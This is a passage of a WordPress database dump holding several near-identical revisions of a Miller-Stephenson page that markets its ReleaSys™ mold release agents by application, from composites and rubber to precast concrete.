style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:34:34', '2017-06-07 15:34:34', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4476, 2, '2017-06-07 15:35:18', '2017-06-07 15:35:18', '[button text="Advanced composites"]\n\n[button text="rotational plastics"]\n\n[button text="Polyurethane-TPU"]\n\n[button text="Rubber - Silicone- Elastomers"]\n\n[button text="injection plastics"]\n\n[button text="fiberglass molds"]\n\n[button text="pre-cast / reinformed concrete"]\n\n[button text="custom formulations"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:35:18', '2017-06-07 15:35:18', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4477, 2, '2017-06-07 15:36:11', '2017-06-07 15:36:11', '[button text="Advanced composites"]\n\n[button text="rotational plastics"]\n\n[button text="Polyurethane-TPU"]\n\n[button text="Rubber - Silicone- Elastomers"]\n\n[button text="injection plastics"]\n\n[button text="fiberglass molds"]\n\n[button text="concrete"]\n\n[button text="custom formulations"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:36:11', '2017-06-07 15:36:11', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4478, 2, '2017-06-07 15:36:47', '2017-06-07 15:36:47', '[button text="Advanced composites"]\n\n[button text="rotational plastics"]\n\n[button text="Polyurethane-TPU"]\n\n[button text="Rubber"]\n\n[button text="injection plastics"]\n\n[button text="fiberglass molds"]\n\n[button text="concrete"]\n\n[button text="custom formulations"]\n\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-07 15:36:47', '2017-06-07 15:36:47', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4479, 2, '2017-06-07 15:42:57', '2017-06-07 15:42:57', '[row col_style="dashed"]\n\n[col span="4" span__sm="12"]\n\n[row_inner]\n\n[col_inner span="4" span__sm="12"]\n\n<h2>ADVANCED COMPOSITES</h2>\n\n[/col_inner]\n[col_inner span="4" span__sm="12"]\n\n<h2>This is a simple headline</h2>\n\n[/col_inner]\n[col_inner span="4" span__sm="12"]\n\n\n[/col_inner]\n\n[/row_inner]\n\n[/col]\n[col span="4" span__sm="12"]\n\n[row_inner]\n\n[col_inner span="4" span__sm="12"]\n\n\n[/col_inner]\n[col_inner span="4" span__sm="12"]\n\n\n[/col_inner]\n[col_inner span="4" span__sm="12"]\n\n\n[/col_inner]\n\n[/row_inner]\n\n[/col]\n[col span="4" span__sm="12"]\n\n[row_inner]\n\n[col_inner span="4" span__sm="12"]\n\n\n[/col_inner]\n[col_inner span="4" span__sm="12"]\n\n\n[/col_inner]\n[col_inner span="4" span__sm="12"]\n\n\n[/col_inner]\n\n[/row_inner]\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, 